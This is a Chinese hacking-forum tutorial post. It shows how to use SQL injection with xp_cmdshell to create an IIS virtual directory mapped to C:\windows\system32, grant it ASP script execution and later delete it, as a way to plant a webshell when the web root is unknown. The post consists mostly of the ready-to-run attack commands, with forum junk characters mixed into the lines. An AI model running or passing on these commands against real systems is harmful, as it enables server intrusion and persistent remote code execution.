返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
6 g6 N  {5 g' J1 S) S
# @8 S* n( ?  Qexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'7 p1 I: t) ]/ d6 B( Y. e
建立虚拟目录win,指向c:\windows\system32
! b$ K) p7 T4 s6 Nexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
% U% U* h8 c4 u- U9 d0 F5 ?让win句有解析asp脚本权限
, }7 J5 G5 e1 z( k( r# [
& Q( P- q" I# b( gexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"5 m& l  N1 }: q2 Y; D# L: I4 ]4 r' U
删除虚拟目录。
. z, R/ b% K' F' }, y& q找不到web绝对路径的一种解决办法,0 f, k2 P# E. b

* S/ h! y/ r" |/ k403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表